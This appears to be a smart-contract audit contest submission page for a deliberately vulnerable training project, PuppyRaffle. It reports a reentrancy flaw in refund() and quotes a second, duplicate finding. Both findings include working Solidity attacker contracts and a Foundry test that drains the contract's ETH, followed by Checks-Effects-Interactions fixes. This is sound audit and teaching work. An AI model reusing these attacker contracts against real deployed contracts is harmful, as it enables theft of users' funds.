Puppy Raffle

AI First Flight #1

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

[H-01] Reentrancy in `refund()` drains all contract ETH through repeated callback before state update

webrainsec

Description

PuppyRaffle's refund() sends ETH to the caller via sendValue() at line 101 before zeroing the player's slot at line 103. Since sendValue() uses a low-level .call{value:}, the recipient's receive() function executes with the player's entry still intact. A malicious contract re-enters refund() with the same index, passes both require checks again, and extracts another entranceFee. This repeats until the contract is empty.

Vulnerability Details

// src/PuppyRaffle.sol, lines 96-105

function refund(uint256 playerIndex) public {

address playerAddress = players[playerIndex];

require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund");

require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active");

payable(msg.sender).sendValue(entranceFee); // @> ETH sent FIRST — triggers receive()

players[playerIndex] = address(0); // @> state update AFTER — too late

emit RaffleRefunded(playerAddress);

}

On each re-entry, players[playerIndex] still holds the attacker's address because the zeroing at line 103 hasn't executed yet. Both require checks pass every time.

Risk

Likelihood:

Any user can deploy a contract with a malicious receive() and enter the raffle through enterRaffle(). No special permissions, no race conditions, no prerequisites beyond the entrance fee.

Impact:

The attacker steals every wei in the contract: all player deposits for the current raffle plus any accumulated totalFees from previous raffles. Every participant loses their entrance fee and the protocol loses all revenue.

PoC

The attacker enters a 4-player raffle (4 ETH total), then calls attack(). The receive() callback re-enters refund() until the contract is empty. Result: 0 ETH left in contract, 4 ETH in attacker.

contract ReentrancyAttacker {

PuppyRaffle public raffle;

uint256 public playerIndex;

uint256 public entranceFee;

constructor(PuppyRaffle _raffle) {

raffle = _raffle;

entranceFee = _raffle.entranceFee();

}

function attack() external {

playerIndex = raffle.getActivePlayerIndex(address(this));

raffle.refund(playerIndex);

}

receive() external payable {

if (address(raffle).balance >= entranceFee) {

raffle.refund(playerIndex);

}

function testExploit_ReentrancyRefund() public {

address[] memory players = new address[](4);

players[0] = address(attacker);

players[1] = address(2);

players[2] = address(3);

players[3] = address(4);

puppyRaffle.enterRaffle{value: entranceFee * 4}(players);

uint256 contractBalanceBefore = address(puppyRaffle).balance;

attacker.attack();

assertEq(address(puppyRaffle).balance, 0, "Contract fully drained");

assertEq(address(attacker).balance, contractBalanceBefore, "Attacker got all ETH");

}

Run: forge test --match-test testExploit_ReentrancyRefund -vvv — PASSES

Recommendations

Move the state update before the external call (Checks-Effects-Interactions pattern):

function refund(uint256 playerIndex) public {

address playerAddress = players[playerIndex];

require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund");

require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active");

+ players[playerIndex] = address(0);

+ emit RaffleRefunded(playerAddress);

payable(msg.sender).sendValue(entranceFee);

- players[playerIndex] = address(0);

- emit RaffleRefunded(playerAddress);

}

Alternatively, add OpenZeppelin's ReentrancyGuard with a nonReentrant modifier.

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 12 hours ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-02] Reentrancy Vulnerability In refund() function

## Description The `PuppyRaffle::refund()` function doesn't have any mechanism to prevent a reentrancy attack and doesn't follow the Check-effects-interactions pattern ## Vulnerability Details ```javascript function refund(uint256 playerIndex) public { address playerAddress = players[playerIndex]; require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund"); require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active"); payable(msg.sender).sendValue(entranceFee); players[playerIndex] = address(0); emit RaffleRefunded(playerAddress); } ``` In the provided PuppyRaffle contract is potentially vulnerable to reentrancy attacks. This is because it first sends Ether to msg.sender and then updates the state of the contract.a malicious contract could re-enter the refund function before the state is updated. ## Impact If exploited, this vulnerability could allow a malicious contract to drain Ether from the PuppyRaffle contract, leading to loss of funds for the contract and its users. ```javascript PuppyRaffle.players (src/PuppyRaffle.sol#23) can be used in cross function reentrancies: - PuppyRaffle.enterRaffle(address[]) (src/PuppyRaffle.sol#79-92) - PuppyRaffle.getActivePlayerIndex(address) (src/PuppyRaffle.sol#110-117) - PuppyRaffle.players (src/PuppyRaffle.sol#23) - PuppyRaffle.refund(uint256) (src/PuppyRaffle.sol#96-105) - PuppyRaffle.selectWinner() (src/PuppyRaffle.sol#125-154) ``` ## POC <details> ```solidity // SPDX-License-Identifier: MIT pragma solidity ^0.7.6; import "./PuppyRaffle.sol"; contract AttackContract { PuppyRaffle public puppyRaffle; uint256 public receivedEther; constructor(PuppyRaffle _puppyRaffle) { puppyRaffle = _puppyRaffle; } function attack() public payable { require(msg.value > 0); // Create a dynamic array and push the sender's address address[] memory players = new address[](1); players[0] = address(this); puppyRaffle.enterRaffle{value: msg.value}(players); } fallback() external payable { if (address(puppyRaffle).balance >= msg.value) { receivedEther += msg.value; // Find the index of the sender's address uint256 playerIndex = puppyRaffle.getActivePlayerIndex(address(this)); if (playerIndex > 0) { // Refund the sender if they are in the raffle puppyRaffle.refund(playerIndex); } } } } ``` we create a malicious contract (AttackContract) that enters the raffle and then uses its fallback function to repeatedly call refund before the PuppyRaffle contract has a chance to update its state. </details> ## Recommendations To mitigate the reentrancy vulnerability, you should follow the Checks-Effects-Interactions pattern. This pattern suggests that you should make any state changes before calling external contracts or sending Ether. Here's how you can modify the refund function: ```javascript function refund(uint256 playerIndex) public { address playerAddress = players[playerIndex]; require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund"); require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active"); // Update the state before sending Ether players[playerIndex] = address(0); emit RaffleRefunded(playerAddress); // Now it's safe to send Ether (bool success, ) = payable(msg.sender).call{value: entranceFee}(""); require(success, "PuppyRaffle: Failed to refund"); } ``` This way, even if the msg.sender is a malicious contract that tries to re-enter the refund function, it will fail the require check because the player's address has already been set to address(0).Also we changed the event is emitted before the external call, and the external call is the last step in the function. This mitigates the risk of a reentrancy attack.

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!